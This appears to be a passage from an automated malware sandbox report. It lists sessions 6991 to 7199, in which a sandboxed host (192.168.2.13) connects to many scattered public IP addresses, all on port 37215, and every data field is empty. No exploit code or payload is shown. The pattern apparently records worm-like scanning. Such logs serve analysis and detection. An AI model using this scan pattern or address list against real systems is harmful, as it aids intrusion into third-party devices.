                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6991192.168.2.133915641.117.158.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6992192.168.2.1352646157.110.203.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6993192.168.2.1333372197.236.133.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6994192.168.2.1342102197.163.9.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6995192.168.2.1359296157.13.9.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6996192.168.2.1353058197.90.211.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6997192.168.2.1340538160.138.253.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6998192.168.2.1344816197.30.209.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6999192.168.2.1354544197.255.102.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7000192.168.2.133443019.131.201.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7001192.168.2.133704241.176.145.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7002192.168.2.134297241.65.156.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7003192.168.2.133821084.36.169.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7004192.168.2.134566441.202.178.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7005192.168.2.1335778197.171.151.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7006192.168.2.133842841.176.16.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7007192.168.2.134373641.10.157.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7008192.168.2.133375841.163.64.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7009192.168.2.134896441.53.188.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7010192.168.2.133409241.91.45.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7011192.168.2.135326041.146.207.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7012192.168.2.1340210157.33.166.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7013192.168.2.1335426134.168.193.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7014192.168.2.1336284197.99.228.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7015192.168.2.135030241.100.198.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7016192.168.2.1348478157.190.97.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7017192.168.2.134710499.5.94.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7018192.168.2.1344608157.190.174.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7019192.168.2.1342342217.21.106.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7020192.168.2.1345038115.42.106.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7021192.168.2.134704041.176.151.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7022192.168.2.1355584197.45.26.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7023192.168.2.1351390183.141.198.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7024192.168.2.134389243.194.148.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7025192.168.2.1334344134.150.152.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7026192.168.2.1347570197.238.189.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7027192.168.2.1350358157.32.47.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7028192.168.2.133434041.101.25.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7029192.168.2.1359722157.45.255.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7030192.168.2.1357806157.170.106.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7031192.168.2.1342036197.232.122.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7032192.168.2.1333484157.134.149.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7033192.168.2.1348194133.227.86.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7034192.168.2.1333670105.181.10.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7035192.168.2.135501041.44.132.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7036192.168.2.1336850197.81.139.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7037192.168.2.1343590197.191.240.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7038192.168.2.135726041.178.217.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7039192.168.2.1343074157.87.45.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7040192.168.2.133373632.99.208.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7041192.168.2.1348944157.113.22.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7042192.168.2.1357210157.105.9.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7043192.168.2.134175041.136.216.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7044192.168.2.1352244197.239.144.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7045192.168.2.1347412157.46.45.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7046192.168.2.135665241.172.143.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7047192.168.2.135340041.133.111.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7048192.168.2.1339052197.237.71.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7049192.168.2.1359718105.219.141.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7050192.168.2.134910241.246.11.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7051192.168.2.1356942157.139.37.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7052192.168.2.135081641.0.5.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7053192.168.2.1349308148.114.148.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7054192.168.2.1358678157.118.134.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7055192.168.2.133835273.114.1.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7056192.168.2.13433869.187.12.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7057192.168.2.1343408197.163.37.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7058192.168.2.133978241.116.128.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7059192.168.2.136009641.7.150.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7060192.168.2.134129241.128.66.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7061192.168.2.1356862157.85.188.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7062192.168.2.1347110221.102.214.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7063192.168.2.1342624153.57.237.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7064192.168.2.1358022163.243.61.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7065192.168.2.135540850.7.75.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7066192.168.2.1342108157.52.154.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7067192.168.2.1348288197.212.208.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7068192.168.2.1344690197.115.97.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7069192.168.2.1346524197.242.102.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7070192.168.2.1345442157.27.55.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7071192.168.2.1345468157.224.39.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7072192.168.2.1336844191.97.30.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7073192.168.2.1338740197.157.81.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7074192.168.2.1337352157.151.68.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7075192.168.2.1337780197.53.199.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7076192.168.2.1347200223.83.131.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7077192.168.2.1349596157.202.75.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7078192.168.2.1354078197.150.177.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7079192.168.2.134099665.160.130.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7080192.168.2.1352534197.206.9.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7081192.168.2.1345608157.190.134.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7082192.168.2.134644841.165.144.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7083192.168.2.1346510157.5.8.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7084192.168.2.1336314157.1.88.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7085192.168.2.1354388157.90.175.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7086192.168.2.1333542197.21.43.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7087192.168.2.135864097.221.53.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7088192.168.2.135783641.90.135.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7089192.168.2.1355064113.150.31.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7090192.168.2.1341758197.93.144.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7091192.168.2.1350188168.173.60.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7092192.168.2.1359250197.137.158.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7093192.168.2.1348338197.87.22.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7094192.168.2.1334120157.181.130.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7095192.168.2.1349876197.132.143.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7096192.168.2.1333502189.48.142.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7097192.168.2.1349152157.169.120.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7098192.168.2.133392841.89.23.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7099192.168.2.133867041.82.25.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7100192.168.2.135820641.43.184.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7101192.168.2.1340776169.185.39.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7102192.168.2.1346414157.184.68.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7103192.168.2.1351226197.71.205.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7104192.168.2.1335704153.38.168.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7105192.168.2.1357070197.178.151.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7106192.168.2.1358822197.254.93.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7107192.168.2.1359434183.28.128.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7108192.168.2.135034241.72.151.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7109192.168.2.1340020124.15.87.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7110192.168.2.134998841.13.20.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7111192.168.2.135685492.105.157.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7112192.168.2.1356976188.48.157.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7113192.168.2.1344754212.108.38.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7114192.168.2.134926641.128.28.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7115192.168.2.1352994170.119.211.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7116192.168.2.1340298197.7.230.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7117192.168.2.1346184197.94.233.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7118192.168.2.1338466109.171.71.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7119192.168.2.1341278202.151.146.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7120192.168.2.134085841.72.93.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7121192.168.2.1353320197.211.234.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7122192.168.2.1351780157.74.57.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7123192.168.2.135297641.0.5.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7124192.168.2.1343526197.227.101.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7125192.168.2.134343041.3.114.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7126192.168.2.1350090175.254.198.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7127192.168.2.1358630197.98.186.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7128192.168.2.134623441.107.68.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7129192.168.2.135367841.43.243.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7130192.168.2.1337924197.32.128.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7131192.168.2.1349222113.230.249.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7132192.168.2.1356722146.222.43.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7133192.168.2.133584447.31.91.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7134192.168.2.1335158157.82.119.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7135192.168.2.1357422104.121.113.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7136192.168.2.1348854157.174.106.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7137192.168.2.1360468157.106.236.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7138192.168.2.1337408180.102.246.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7139192.168.2.135777241.50.3.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7140192.168.2.1356922157.234.134.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7141192.168.2.1354984197.42.60.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7142192.168.2.1336250157.206.128.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7143192.168.2.1354578197.245.240.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7144192.168.2.134636641.88.101.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7145192.168.2.1350926197.54.166.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7146192.168.2.1353738197.100.142.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7147192.168.2.1346676197.18.34.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7148192.168.2.134508237.4.105.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7149192.168.2.134440641.61.147.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7150192.168.2.1343030178.92.10.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7151192.168.2.133505241.111.249.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7152192.168.2.1344468157.40.36.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7153192.168.2.1338526157.108.41.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7154192.168.2.1334080197.204.99.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7155192.168.2.1352786216.168.40.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7156192.168.2.1339348197.97.227.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7157192.168.2.134331889.172.163.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7158192.168.2.1346254157.185.205.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7159192.168.2.134980475.158.157.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7160192.168.2.133622441.109.107.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7161192.168.2.133698845.204.229.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7162192.168.2.135768413.121.62.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7163192.168.2.1339726107.109.58.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7164192.168.2.135430441.13.92.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7165192.168.2.1347774197.144.43.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7166192.168.2.1351110197.59.1.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7167192.168.2.133685841.3.146.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7168192.168.2.135189634.238.42.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7169192.168.2.1348336133.51.198.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7170192.168.2.1360374157.72.255.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7171192.168.2.13493201.43.31.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7172192.168.2.1348408197.176.92.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7173192.168.2.1340412197.92.36.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7174192.168.2.135857641.104.102.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7175192.168.2.134916241.21.186.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7176192.168.2.133327241.136.62.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7177192.168.2.1337028197.143.242.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7178192.168.2.1346744197.195.128.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7179192.168.2.1336246156.45.6.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7180192.168.2.1346206135.21.231.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7181192.168.2.1351076197.14.207.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7182192.168.2.1355444216.220.120.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7183192.168.2.1338966197.24.175.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7184192.168.2.1340790197.196.160.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7185192.168.2.134079080.236.246.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7186192.168.2.133394641.155.118.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7187192.168.2.1351582197.68.166.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7188192.168.2.134167017.169.58.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7189192.168.2.133770441.236.177.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7190192.168.2.133547041.184.146.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7191192.168.2.1337874157.214.26.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7192192.168.2.1354248197.243.8.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7193192.168.2.1347508157.165.254.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7194192.168.2.1349834157.34.251.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7195192.168.2.133926267.39.63.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7196192.168.2.134604441.107.44.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7197192.168.2.1333464197.35.34.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7198192.168.2.1335324110.139.26.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7199192.168.2.1360078197.123.199.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
